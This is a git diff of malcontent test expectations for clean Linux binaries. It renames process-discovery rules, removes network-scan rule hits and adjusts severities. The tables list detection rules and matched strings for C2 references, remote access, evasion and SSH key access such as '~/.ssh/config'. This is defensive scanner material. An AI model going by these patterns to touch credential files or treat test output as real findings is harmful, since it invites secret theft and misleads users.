[/home/linuxbrew/.linuxbrew/opt/zlib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fzlib%2Flib&type=code) |
 | MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./include](https://github.com/search?q=.%2Finclude&type=code) |
 | MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/](https://github.com/search?q=%2Ftmp%2F&type=code) |
diff --git a/tests/linux/clean/melange.simple b/tests/linux/clean/melange.simple
index e5eeedda2..4702fc3f4 100644
--- a/tests/linux/clean/melange.simple
+++ b/tests/linux/clean/melange.simple
@@ -44,7 +44,7 @@ discover/user/HOME: low
 discover/user/USER: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/se: medium
-evasion/file/location/system_directories: medium
+evasion/file/location/system_directory: medium
 evasion/file/prefix: medium
 evasion/hide_artifacts/pivot_root: medium
 exec/cmd: medium
@@ -94,7 +94,6 @@ fs/unmount: low
 fs/watch: low
 impact/remote_access/heartbeat: medium
 impact/remote_access/kill_rm: medium
-lateral/scan/tool: medium
 net/dns: low
 net/dns/reverse: medium
 net/dns/servers: low
diff --git a/tests/linux/clean/mongosh.simple b/tests/linux/clean/mongosh.simple
index a2b7f4434..cd28c793c 100644
--- a/tests/linux/clean/mongosh.simple
+++ b/tests/linux/clean/mongosh.simple
@@ -4,7 +4,6 @@ anti-static/obfuscation/hex: medium
 anti-static/obfuscation/obfuscate: low
 c2/addr/http_dynamic: medium
 c2/addr/ip: medium
-c2/addr/url: high
 c2/discovery/ip_dns_resolver: medium
 c2/server_address: medium
 collect/archives/unarchive: medium
@@ -40,6 +39,8 @@ discover/group/lookup: medium
 discover/network/interface_get: low
 discover/network/interface_list: medium
 discover/network/mac_address: medium
+discover/process/name_get: medium
+discover/process/parent_pid_get: low
 discover/processes/list: medium
 discover/system/hostname_get: low
 discover/system/platform: medium
@@ -160,9 +161,7 @@ process/create: low
 process/groupid_set: low
 process/groups_set: low
 process/multithreaded: low
-process/name_get: medium
 process/namespace_set: low
-process/parent_pid_get: low
 process/terminate: medium
 process/terminate/taskkill: medium
 process/userid_set: low
diff --git a/tests/linux/clean/nvim.simple b/tests/linux/clean/nvim.simple
index cdba2a285..71aa9e4b5 100644
--- a/tests/linux/clean/nvim.simple
+++ b/tests/linux/clean/nvim.simple
@@ -16,7 +16,7 @@ discover/processes/pgrep: medium
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
-evasion/file/location/tmp_x11_unix: low
+evasion/file/location/x11_unix: low
 evasion/file/prefix: medium
 exec/conditional/LANG: low
 exec/dylib/symbol_address: medium
@@ -54,7 +54,6 @@ fs/tempdir/TEMP: low
 fs/tempdir/TMPDIR: low
 fs/tempdir/create: low
 fs/tempdir/tempfile_create: low
-lateral/scan/tool: medium
 net/dns/servers: low
 net/download/fetch: medium
 net/http/post: medium
diff --git a/tests/linux/clean/opa.simple b/tests/linux/clean/opa.simple
index 25d47620c..360cb7418 100644
--- a/tests/linux/clean/opa.simple
+++ b/tests/linux/clean/opa.simple
@@ -53,7 +53,6 @@ fs/proc/self_cgroup: medium
 fs/proc/self_mountinfo: medium
 fs/tempdir/tempfile_create: low
 fs/watch: low
-lateral/scan/tool: medium
 net/dns: low
 net/dns/reverse: medium
 net/dns/servers: low
diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md
index cb282ccb5..d707b5e2f 100644
--- a/tests/linux/clean/pandoc.md
+++ b/tests/linux/clean/pandoc.md
@@ -20,6 +20,8 @@ | MEDIUM | [data/hash/whirlpool](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/whirlpool.yara#whirlpool) | [hash function often used for cryptomining](https://en.wikipedia.org/wiki/Whirlpool_(hash_function)) | [WHIRLPOOL](https://github.com/search?q=WHIRLPOOL&type=code) | | MEDIUM | [discover/group/lookup](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/group/lookup.yara#getgrent) | get entry from group database | [endgrent](https://github.com/search?q=endgrent&type=code)
[getgrent](https://github.com/search?q=getgrent&type=code)
[setgrent](https://github.com/search?q=setgrent&type=code) | | MEDIUM | [discover/network/netstat](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/netstat.yara#netstat) | Uses 'netstat' for network information | [netstat](https://github.com/search?q=netstat&type=code) | +| MEDIUM | [discover/process/effective_groupid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/effective-groupid-get.yara#php_getmygid) | returns the effective group id of the current process | [getmygid](https://github.com/search?q=getmygid&type=code) | +| MEDIUM | [discover/process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [CmdForListBodyStartCmd](https://github.com/search?q=CmdForListBodyStartCmd&type=code)
[SystemziProcess_runCommand1_closure](https://github.com/search?q=SystemziProcess_runCommand1_closure&type=code)
[SystemziProcess_runCommand1_info](https://github.com/search?q=SystemziProcess_runCommand1_info&type=code)
[SystemziProcess_runCommand2_closure](https://github.com/search?q=SystemziProcess_runCommand2_closure&type=code)
[SystemziProcess_runCommand3_bytes](https://github.com/search?q=SystemziProcess_runCommand3_bytes&type=code)
[SystemziProcess_runCommand_closure](https://github.com/search?q=SystemziProcess_runCommand_closure&type=code)
[SystemziProcess_runCommand_info](https://github.com/search?q=SystemziProcess_runCommand_info&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code) | @@ -71,8 +73,6 @@ | MEDIUM | [persist/kernel_module/module](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/kernel_module/module.yara#delete_module) | Unload Linux kernel module | [delete_module](https://github.com/search?q=delete_module&type=code) | | MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [PidFile](https://github.com/search?q=PidFile&type=code) | | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo](https://github.com/search?q=sudo&type=code) | -| MEDIUM | [process/effective_groupid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/effective-groupid-get.yara#php_getmygid) | returns the effective group id of the current process | [getmygid](https://github.com/search?q=getmygid&type=code) | -| MEDIUM | [process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | | MEDIUM | [sec-tool/net/nmap](https://github.com/chainguard-dev/malcontent/blob/main/rules/sec-tool/net/nmap.yara#nmap) | nmap | [nmap](https://github.com/search?q=nmap&type=code) | | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercept](https://github.com/search?q=intercept&type=code) | | LOW | [anti-static/obfuscation/obfuscate](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/obfuscate.yara#obfuscate) | Mentions the word obfuscate | [obfuscatedFont](https://github.com/search?q=obfuscatedFont&type=code)
[obfuscates](https://github.com/search?q=obfuscates&type=code) | @@ -89,6 +89,7 @@ | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) | | LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) | +| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [discover/system/cpu_info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/system/machine_id](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/machine_id.yara#machineid) | Gets a unique machineid for the host | [machineid](https://github.com/search?q=machineid&type=code) | 
@@ -151,7 +152,6 @@ | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | | LOW | [process/namespace_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/namespace-set.yara#setns) | associate thread or process with a namespace | [setns](https://github.com/search?q=setns&type=code) | -| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [process/unshare](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/unshare.yara#syscall_unshare) | disassociate parts of the process execution context | [unshare](https://github.com/search?q=unshare&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/ping.x86_64.md b/tests/linux/clean/ping.x86_64.md index f2f50ce2f..9a3b9ab45 100644 --- a/tests/linux/clean/ping.x86_64.md +++ b/tests/linux/clean/ping.x86_64.md @@ -5,7 +5,6 @@ | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Port](https://github.com/search?q=Port&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code) | | MEDIUM | [discover/system/network](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/system_network.yara#sys_net_recon) | collects system and network information | [id](https://github.com/search?q=id&type=code)
[ipv4=addr](https://github.com/search?q=ipv4%3Daddr&type=code)
[ipv6=addr](https://github.com/search?q=ipv6%3Daddr&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code) | | MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | | MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping -6 -N](https://github.com/search?q=ping+-6+-N&type=code)
[ping broadcast](https://github.com/search?q=ping+broadcast&type=code)
[ping does not fragment](https://github.com/search?q=ping+does+not+fragment&type=code)
[ping for user must be](https://github.com/search?q=ping+for+user+must+be&type=code)
[ping session](https://github.com/search?q=ping+session&type=code)
[ping statistics ---](https://github.com/search?q=ping+statistics+---&type=code) |
 | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) |
diff --git a/tests/linux/clean/pulumi.simple b/tests/linux/clean/pulumi.simple
index 0f4a608e6..f881eac07 100644
--- a/tests/linux/clean/pulumi.simple
+++ b/tests/linux/clean/pulumi.simple
@@ -38,6 +38,7 @@ discover/cloud/google_metadata: low
 discover/cloud/google_storage: low
 discover/group/lookup: medium
 discover/network/mac_address: medium
+discover/process/parent_pid_get: low
 discover/processes/list: medium
 discover/system/cpu_info: low
 discover/system/hostname_get: low
@@ -141,7 +142,6 @@ persist/kernel_module/module: medium
 persist/pid_file: medium
 privesc/sudo: medium
 process/chroot: low
-process/parent_pid_get: low
 sus/exclamation: medium
 sus/intercept: medium
 sus/leetspeak: medium
diff --git a/tests/linux/clean/pypi_package_index.json.simple b/tests/linux/clean/pypi_package_index.json.simple
index 362414c5c..e75f5caf3 100644
--- a/tests/linux/clean/pypi_package_index.json.simple
+++ b/tests/linux/clean/pypi_package_index.json.simple
@@ -156,7 +156,6 @@ impact/rootkit: low
 impact/ui/screen_capture: high
 impact/ui/x11_auth: medium
 lateral/scan/brute_force: low
-lateral/scan/tool: high
 net/dns/over_https: medium
 net/download: medium
 net/http/auth: low
diff --git a/tests/linux/clean/qemu-system-xtensa.md b/tests/linux/clean/qemu-system-xtensa.md
index dc3add18d..36b975a5a 100644
--- a/tests/linux/clean/qemu-system-xtensa.md
+++ b/tests/linux/clean/qemu-system-xtensa.md
@@ -7,7 +7,7 @@ | MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#command_and_control) | Uses terms that may reference a command and control server | [c2_port](https://github.com/search?q=c2_port&type=code) | | MEDIUM | [c2/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/server_address.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) | | MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | -| MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [/.ssh/config](https://github.com/search?q=%2F.ssh%2Fconfig&type=code) | +| MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [~/.ssh/config](https://github.com/search?q=~%2F.ssh%2Fconfig&type=code) | | MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | | MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code) | | MEDIUM | 
[evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | @@ -29,7 +29,7 @@ | MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [vdagent](https://github.com/search?q=vdagent&type=code) | | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [06zu:qmp_enter_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_enter_x_colo_lost_heartbeat&type=code)
[06zu:qmp_exit_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_exit_x_colo_lost_heartbeat&type=code)
[Tell COLO that heartbeat is lost](https://github.com/search?q=Tell+COLO+that+heartbeat+is+lost&type=code)
[hmp_x_colo_lost_heartbeat](https://github.com/search?q=hmp_x_colo_lost_heartbeat&type=code)
[qmp_marshal_x_colo_lost_heartbeat](https://github.com/search?q=qmp_marshal_x_colo_lost_heartbeat&type=code)
[qmp_x_colo_lost_heartbeat](https://github.com/search?q=qmp_x_colo_lost_heartbeat&type=code) | | MEDIUM | [impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#exec_chdir_and_socket) | exec chdir and socket | [chdir](https://github.com/search?q=chdir&type=code)
[execve](https://github.com/search?q=execve&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [mem/anonymous_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/anonymous-file.yara#memfd_create) | create an anonymous file | [memfd_create](https://github.com/search?q=memfd_create&type=code) | | MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[WebSocket](https://github.com/search?q=WebSocket&type=code) | @@ -58,6 +58,7 @@ | LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | | LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:](https://github.com/search?q=md5%3A&type=code) | | LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | +| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) | @@ -92,7 +93,6 @@ | LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [process/unshare](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/unshare.yara#syscall_unshare) | disassociate parts of the process execution context | [unshare](https://github.com/search?q=unshare&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/redis-server.aarch64.md b/tests/linux/clean/redis-server.aarch64.md index 9e4875559..300e3d50b 100644 --- a/tests/linux/clean/redis-server.aarch64.md 
+++ b/tests/linux/clean/redis-server.aarch64.md @@ -16,7 +16,6 @@ | MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | | MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | diff --git a/tests/linux/clean/rules.json.simple b/tests/linux/clean/rules.json.simple index eede552e9..f025f01ea 100644 --- a/tests/linux/clean/rules.json.simple +++ b/tests/linux/clean/rules.json.simple @@ -55,7 +55,6 @@ hw/wireless: low impact/exploit: medium impact/exploit/cve: medium impact/remote_access/iptables: medium -lateral/scan/tool: medium net/dns/servers: low net/download: medium net/http/cookies: medium diff --git a/tests/linux/clean/runtime-security-fentry.o.simple b/tests/linux/clean/runtime-security-fentry.o.simple index 9513547c8..c320ec689 100644 --- a/tests/linux/clean/runtime-security-fentry.o.simple +++ b/tests/linux/clean/runtime-security-fentry.o.simple @@ -17,7 +17,6 @@ fs/permission/chown: low fs/permission/modify: medium fs/unmount: low impact/remote_access/net_exec: medium -lateral/scan/tool: medium net/http/post: medium net/ip/multicast_send: low net/ip/parse: medium diff --git a/tests/linux/clean/runtime-security-syscall-wrapper.o.simple b/tests/linux/clean/runtime-security-syscall-wrapper.o.simple index fdfff6f56..9abc1e818 100644 --- a/tests/linux/clean/runtime-security-syscall-wrapper.o.simple +++ b/tests/linux/clean/runtime-security-syscall-wrapper.o.simple @@ -18,7 +18,6 @@ fs/permission/chown: low fs/permission/modify: medium fs/unmount: low impact/remote_access/net_exec: medium -lateral/scan/tool: medium net/http/post: medium net/ip/multicast_send: low net/ip/parse: medium 
diff --git a/tests/linux/clean/runtime-security.o.simple b/tests/linux/clean/runtime-security.o.simple index 741309cab..a00a6c4c9 100644 --- a/tests/linux/clean/runtime-security.o.simple +++ b/tests/linux/clean/runtime-security.o.simple @@ -17,7 +17,6 @@ fs/permission/chown: low fs/permission/modify: medium fs/unmount: low impact/remote_access/net_exec: medium -lateral/scan/tool: medium net/http/post: medium net/ip/multicast_send: low net/ip/parse: medium diff --git a/tests/linux/clean/searchindex.json.simple b/tests/linux/clean/searchindex.json.simple index fefb0d049..38d2ee056 100644 --- a/tests/linux/clean/searchindex.json.simple +++ b/tests/linux/clean/searchindex.json.simple @@ -13,7 +13,7 @@ discover/components/docker: medium discover/system/platform: low discover/system/sysinfo: medium evasion/file/location/chdir_unusual: medium -evasion/file/location/system_directories: medium +evasion/file/location/system_directory: medium evasion/rootkit/refs: medium exec/install_additional/package_install: medium exec/install_additional/pip_install: medium @@ -37,7 +37,7 @@ fs/path/usr_local: medium fs/path/var: low fs/path/var_log: medium fs/watch: low -impact/exploit: high +impact/exploit: medium impact/infection/infected: medium impact/remote_access/agent: medium impact/remote_access/backdoor: high diff --git a/tests/linux/clean/slack.md b/tests/linux/clean/slack.md index 1d262642c..6656a00a5 100644 --- a/tests/linux/clean/slack.md +++ b/tests/linux/clean/slack.md @@ -26,6 +26,8 @@ | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [[](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code)
[ifconfig](https://github.com/search?q=ifconfig&type=code)
[networkInterfaces](https://github.com/search?q=networkInterfaces&type=code) | | MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [macAddress](https://github.com/search?q=macAddress&type=code) | +| MEDIUM | [discover/process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | +| MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.arch](https://github.com/search?q=process.arch&type=code)
[process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) | | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | | MEDIUM | [discover/user/info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/userinfo.yara#userinfo) | returns user info for the current process | [os.homedir](https://github.com/search?q=os.homedir&type=code) | 
